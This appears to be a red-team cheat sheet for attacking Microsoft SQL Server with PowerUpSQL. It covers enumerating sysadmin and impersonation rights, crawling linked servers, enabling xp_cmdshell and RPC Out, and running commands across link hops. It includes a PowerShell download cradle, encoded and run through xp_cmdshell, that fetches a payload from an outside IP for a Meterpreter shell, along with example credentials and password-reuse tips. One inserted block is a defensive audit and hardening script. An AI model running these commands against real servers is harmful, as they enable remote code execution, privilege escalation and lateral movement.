# SQL Server Instance

* Instance

```
# Local instances (PowerUpSQL)
Get-SQLInstanceLocal

# Instances registered in the domain via SPNs (PowerUpSQL)
Get-SQLInstanceDomain

# Test whether the current user can connect to an instance (PowerUpSQL)
Get-SQLConnectionTest -Instance "srv-1.red.com,1433"
```

* Server Info

```
# Version, service account and login context (PowerUpSQL)
Get-SQLServerInfo -Instance "redsql\sqlexpress"
```

* Privilege Enumeration

Logins that hold the sysadmin role

```
# PowerUpSQL query
Get-SQLQuery -Instance 'red.com,1433' -Query "select name from master..syslogins where sysadmin=1;"
```

Logins that can be impersonated by the current login (IMPERSONATE grants at server level)

```
# PowerUpSQL query
Get-SQLQuery -Instance 'red.com,1433' -Query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"
```

* Linked Servers

Not every login can see every link; the results depend on the privileges of the login running the query.

```
-- SQL query
select * from master..sysservers;

-- SQL query
exec sp_linkedservers;

# PowerUpSQL: crawl the links reachable from the given instance
get-sqlserverlinkcrawl -instance "cywebdw\sqlexpress" -username webapp11 -password 89543dfGDFGH4d

# PowerUpSQL: list the links defined on the remote server through OPENQUERY
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery(""m3sqlw.red.local"",'select * from master..sysservers')"
```

* xp_cmdshell status

```
-- SQL query (value_in_use = 1 means xp_cmdshell is enabled)
select * from sys.configurations where name='xp_cmdshell';

# PowerUpSQL query
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from sys.configurations where name ='xp_cmdshell'"

# PowerUpSQL query against a linked server through OPENQUERY
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery (""m3sqlw.red.local"",'select * from sys.configurations where name=''xp_cmdshell''')"
```

* Enable xp_cmdshell

```
-- SQL query (requires sysadmin, or the ALTER SETTINGS permission)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- SQL query
exec xp_cmdshell 'whoami';

# PowerUpSQL query
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC master.dbo.xp_cmdshell 'whoami';"

# PowerUpSQL query, one link hop (EXEC ... AT needs RPC Out enabled on the link)
get-sqlquery -instance "web06\sqlexpress" -query "exec ('sp_configure ''show advanced options'', 1; reconfigure; exec sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql03; exec('xp_cmdshell ''hostname'';') at SQL03" -username sa -password Passw0rd
```

* xp_cmdshell Meterpreter shell

```
# Encode the payload as a UTF-16LE base64 string for powershell -enc (bash)
echo -en 'IEX ((new-object net.webclient).downloadstring("http://10.10.14.111/runner64.txt"))' | iconv -t UTF-16LE | base64 -w 0

-- SQL query
exec xp_cmdshell 'powershell -w hidden -enc <...>';

# PowerUpSQL query 1
Invoke-SQLOSCmd -Instance "CYWEBDW\SQLEXPRESS" -Command "powershell -w hidden -enc <...> " -RawResults

# PowerUpSQL query 2
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) "

# PowerUpSQL query, one link hop
get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) AT [m3sqlw.red.local]"
```

* Enable RPC Out

```
-- SQL query (run as sa; RPC Out is what allows EXEC ... AT on the link)
execute as login='sa'; exec sp_serveroption 'sql03', 'rpc out', 'true';

# PowerUpSQL query
get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true'"

# PowerUpSQL query, one link hop (the statement passed to EXEC ... AT must be a string literal)
get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec ('sp_serveroption ''m3sqlw.red.local'', ''rpc out'', ''true''') at [m3sqlw.red.local]"
```
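The defender-side counterpart of the checks above, added here as an example and not part of the original notes: a T-SQL audit that lists, on one instance, the settings the enumeration commands look for (xp_cmdshell state, sysadmin membership, IMPERSONATE grants with both grantee and target, linked servers with RPC Out) followed by the hardening statements that reverse them. It assumes it is run as sysadmin; the link name m3sqlw.red.local and the login names in the commented REVOKE are taken from the page and used only as placeholders.

```sql
-- Added audit script (not from the original notes). Run as sysadmin on the
-- instance under review; each SELECT mirrors one enumeration step above.
SET NOCOUNT ON;

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means it is live right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Who holds the sysadmin role? This list should be short and known.
SELECT r.name AS role_name, m.name AS member_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals AS m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin';

-- 3. Server-level IMPERSONATE grants, shown as grantee -> login it may
--    impersonate (the page's query only shows the grantor side).
SELECT gr.name AS grantee, tg.name AS can_impersonate, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS gr ON p.grantee_principal_id = gr.principal_id
JOIN sys.server_principals AS tg ON p.major_id = tg.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL';

-- 4. Linked servers: RPC Out is what makes EXEC ... AT possible, and
--    data access is what OPENQUERY needs. Visibility depends on the caller.
SELECT name, data_source, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- Hardening counterparts, left commented so the audit stays read-only.
-- Uncomment after reviewing the results for the instance in question.
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
-- EXEC sp_serveroption 'm3sqlw.red.local', 'rpc out', 'false';   -- link name from the page
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [webapp11];             -- placeholder pair, adjust
```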

#### Privilege escalation does not have to be done immediately

Domain Admins or certain domain users may already have admin privileges over the current host.

#### Password/hash reuse

Similar machines may share the same password or hash, for example:

* SQL01 and SQL02
* SQL01 and File01
